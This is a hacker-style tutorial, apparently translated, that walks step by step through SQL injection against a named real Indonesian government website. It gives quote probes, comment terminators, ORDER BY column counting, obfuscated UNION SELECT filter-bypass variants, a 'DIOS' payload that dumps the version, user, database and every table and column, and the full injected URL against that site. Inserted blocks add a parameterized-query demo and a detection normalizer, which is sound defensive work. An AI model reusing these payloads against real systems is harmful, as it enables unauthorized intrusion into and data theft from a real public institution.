*SQL INJECTION (CHALLENGE) IN AN HTML PARAMETER*
*ASSALAMUALAIKUM, BACK AGAIN WITH ME, KICK_OUT. THIS TIME I WILL SHARE A CHALLENGE TUTORIAL BASED ON A PARAMETER IN HTML*
*FOR THE CHALLENGE:*
*https://lampung.kemenag.go.id/*
*TO FIND THE ID PARAMETER, GO TO ANON HACKBAR. IF YOU DON'T HAVE ANON HACKBAR YOU CAN DOWNLOAD IT FROM GOOGLE, THERE ARE PLENTY OF VERSIONS :)*
*PASTE THE TARGET WEBSITE INTO ANON HACKBAR*
*SCROLL THE THIRD ONE FROM THE TOP ALL THE WAY TO THE END AND PRESS EXTRACT LINKS*
*CHOOSE PAGE LINKS*
*PICK ONE OF THE FOLLOWING WEBSITES*
*ONCE YOU HAVE IT, PASTE IT INTO GOOGLE, OR IF YOU PREFER TO INJECT DIRECTLY IN ANON THAT WORKS TOO, IT'S A MATTER OF TASTE :)*
*TO CHECK WHETHER IT IS VULN OR NOT, WE ADD A SINGLE QUOTE TO SEE WHETHER THE WEBSITE IS VULNERABLE TO SQL INJECTION :)*
*IF IT IS VULN THERE WILL BE A CHANGE ON THE WEBSITE, WHETHER IN THE IMAGES OR THE FONT OF THE WEBSITE*
*ADD A BALANCE AFTER THE PARAMETER / AFTER THAT QUOTE :)*
*AND THE WEBSITE GOES BACK TO NORMAL*
*THERE ARE SEVERAL KINDS OF BALANCE, FOR EXAMPLE:*
*1. --+-*
*2. -- -*
*3. --+*
*4. +--+*
*5. %23*
*6. ;%00*
*( AND MANY MORE )*
*ONCE THAT'S DONE, YOU JUST ORDER BY UNTIL IT ERRORS AGAIN, FOR EXAMPLE:*
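Why the quote breaks the page and the "balance" restores it, shown against a small constructed SQLite table instead of the site above. This is an added example, not code from the post or from the target; the table, its column names and both lookup functions are assumptions. The vulnerable lookup splices the id into the SQL text, so a stray `'` leaves an unterminated string (the broken page) and a trailing `--+-` comments the rest of the statement out (the page looks normal again). The hardened lookup validates the id as an integer and binds it as a parameter, so both probes get the same rejection and there is nothing to "balance".

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for an article table (assumption, not the site's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO posts VALUES (?, ?)",
                    [(1, "Welcome"), (2, "Announcement")])
    return con


def lookup_vulnerable(con, raw_id):
    """String-concatenated query: whatever the user sends becomes part of the SQL."""
    sql = f"SELECT title FROM posts WHERE id = '{raw_id}'"
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # A bare quote leaves the string literal open: this is the "page looks broken" signal.
        return ("error", str(exc))
    # With a comment sequence appended the statement parses again: "back to normal".
    return ("ok", row[0] if row else None)


def lookup_safe(con, raw_id):
    """Validate the type first, then bind the value; the input can never become SQL."""
    try:
        post_id = int(raw_id)
    except ValueError:
        return ("rejected", None)          # same answer for "1'" and for "1'--+-"
    row = con.execute("SELECT title FROM posts WHERE id = ?", (post_id,)).fetchone()
    return ("ok", row[0] if row else None)


def demo():
    """Run the post's two probes (quote, then quote + balance) against both lookups."""
    con = make_db()
    probes = ["1", "1'", "1'--+-"]
    return {p: (lookup_vulnerable(con, p), lookup_safe(con, p)) for p in probes}


if __name__ == "__main__":
    for probe, (vuln, safe) in demo().items():
        print(f"{probe!r:12} vulnerable={vuln}  hardened={safe}")
```

The oracle the post relies on is the difference between the error response and the normal one. Only the concatenated version produces that difference; the parameterized version answers every malformed id identically, which is the check to look for in code review.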
*ORDER BY 1--+-*
*ORDER BY 2--+-*
*ORDER BY 3--+-*
*AND THERE IS ALSO AN ORDER BY BYPASS, FOR EXAMPLE:*
*ORDER+BY+1+ASC--+-*
*HERE THE WEBSITE ERRORED AT NUMBER 17, WHICH MEANS THERE ARE ONLY 16 NUMBERS :)*
*THE WAY TO FIND THE LOTTERY NUMBER IS:*
*UNION SELECT 1--+-*
*UNION SELECT 2--+-*
*UP TO THE NUMBER YOU GOT FROM THE ORDER BY RESULT EARLIER*
*AND THERE IS ALSO A UNION SELECT BYPASS, FOR EXAMPLE:*
1.+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3 ( UNTIL ERROR ) --+-
2.+AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+
*AND MANY MORE :)*
*IF THE WEBSITE STILL DOESN'T SHOW THE LOTTERY NUMBER, USE ( - ) ( . ) BEFORE THE ID PARAMETER, and there are also some that use ( %25 0 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html )*
*AND BOOM, THE LOTTERY NUMBER COMES OUT :)*
*NOW WE JUST INJECT BY PUTTING THE DIOS INTO THAT LOTTERY NUMBER*
*LIKE THIS: Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html*
*AND BOOM, SOLVED :)*
THE DIOS I USE:
/*!50000cOncat/**KICK_OUT**/*/(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,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,0x3c62723e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**KICK_OUT**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**KICK_OUT**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**KICK_OUT**/*/(),0x3c62723e,(selEct(@x)/*!50000fRom/**KICK_OUT**/*/(/*!50000sElect/**KICK_OUT**/*/(@x:=0x00),(sElect(0)/*!From/**KICK_OUT**/*/(/*!50000inforMation_schEma.coLuMns/**KICK_OUT**/*/)/*!50000Where/**KICK_OUT**/*/(taBle_schema=/*!50000DatAbase/**KICK_OUT*/*/())and(0x00)in(@x:=/*!50000coNcat/**KICK_OUT**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**KICK_OUT**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**KICK_OUT**/*/))))x))
*AND THE RESULT:*
https://lampung.kemenag.go.id/static--43310'%20UNION%20SELECT%201,/*!50000cOncat/**KICK_OUT**/*/(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,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,0x3c62723e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**KICK_OUT**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**KICK_OUT**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**KICK_OUT**/*/(),0x3c62723e,(selEct(@x)/*!50000fRom/**KICK_OUT**/*/(/*!50000sElect/**KICK_OUT**/*/(@x:=0x00),(sElect(0)/*!From/**KICK_OUT**/*/(/*!50000inforMation_schEma.coLuMns/**KICK_OUT**/*/)/*!50000Where/**KICK_OUT**/*/(taBle_schema=/*!50000DatAbase/**KICK_OUT*/*/())and(0x00)in(@x:=/*!50000coNcat/**KICK_OUT**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**KICK_OUT**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**KICK_OUT**/*/))))x)),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html
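A defender's counterpart to the bypass payloads above: a small request normalizer that undoes the URL encoding and strips both the `/*!50000...*/` versioned comments (MySQL still executes what is inside them, which is why the post's payloads still work) and the `/**...**/` filler comments before matching, so the case mixing, `%55niON` encoding and comment splitting on this page do not hide `UNION SELECT` or `information_schema` from a rule. This is an added example, not code from the post; the request paths are constructed to mimic the shape of the URLs above (a `--` inside an ordinary path name is included on purpose so the comment-terminator rule does not fire on it), and the rule names, weights and alert threshold are assumptions to tune on real traffic.

```python
import re
from urllib.parse import unquote_plus

# Two comment styles the payloads above lean on:
#   /*!50000UNION*/  MySQL versioned comment: the keyword inside is still executed
#   /**KICK_OUT**/   ordinary inline comment used as filler between tokens
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)      # drop entirely
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # keep the payload inside

# (rule name, pattern over the normalized upper-cased text, weight) -- assumed values
RULES = [
    ("union_select", re.compile(r"\bUNION\b(\s+ALL)?\s+SELECT\b"), 3),
    ("schema_enum", re.compile(r"\bINFORMATION_SCHEMA\b"), 3),
    ("order_by_probe", re.compile(r"\bORDER\s+BY\s+\d+"), 2),
    # the "balances" from the list above, allowing a trailing pseudo-static extension
    ("comment_terminator", re.compile(r"(--[\s+-]*|#|;\x00)\s*(\.\w+)?$"), 2),
    ("quote", re.compile(r"'"), 1),
]
ALERT_THRESHOLD = 2  # a lone quote (score 1) is logged but not alerted on


def normalize(raw):
    """Decode, strip comment obfuscation, collapse whitespace, upper-case."""
    s = raw
    for _ in range(3):          # undo URL encoding, including double encoding (%2527)
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    while True:                 # comments nest in the DIOS payload, so peel until stable
        stripped = VERSIONED_COMMENT.sub(r" \1 ", PLAIN_COMMENT.sub(" ", s))
        if stripped == s:
            break
        s = stripped
    return re.sub(r"\s+", " ", s).strip().upper()


def analyze(path):
    """Score one request path; returns the evidence a SOC analyst would want to see."""
    norm = normalize(path)
    hits = [name for name, pat, _ in RULES if pat.search(norm)]
    score = sum(w for name, _, w in RULES if name in hits)
    return {"path": path, "normalized": norm, "hits": hits,
            "score": score, "alert": score >= ALERT_THRESHOLD}


def scan(paths):
    """Return only the requests that cross the alert threshold."""
    return [r for r in (analyze(p) for p in paths) if r["alert"]]


# Constructed access-log paths shaped like the post's URLs (not real traffic).
SAMPLE_REQUESTS = [
    "/news--1001.html",                                    # benign pseudo-static page
    "/news--1001'.html",                                   # the first probe: a bare quote
    "/news--1001'%20order%20by%2017--+-.html",             # column counting
    "/news--1001'%20/*!50000%55niON*/%20/*!50000%53eLeCt*/%201,2,3--+-.html",
    "/news--1001'%20UNION%20SELECT%201,/*!50000cOncat/**X**/*/(/*!50000VerSiOn/**X**/*/(),"
    "(selEct(0)/*!From/**X**/*/(/*!50000inforMation_schEma.coLuMns/**X**/*/))),3--+-.html",
]

if __name__ == "__main__":
    for r in (analyze(p) for p in SAMPLE_REQUESTS):
        flag = "ALERT" if r["alert"] else "     "
        print(f"{flag} score={r['score']} hits={r['hits']} {r['normalized']}")
```

Matching after normalization is the point: a rule that looks for the literal string `UNION SELECT` in the raw URL misses every payload on this page, while the normalized text of the DIOS request reads `... UNION SELECT 1, CONCAT ( VERSION (), ... INFORMATION_SCHEMA.COLUMNS ...` and trips three rules at once. The lone-quote probe stays below the threshold on its own; keep it as a low-confidence signal to correlate with the `ORDER BY` sequence that follows it.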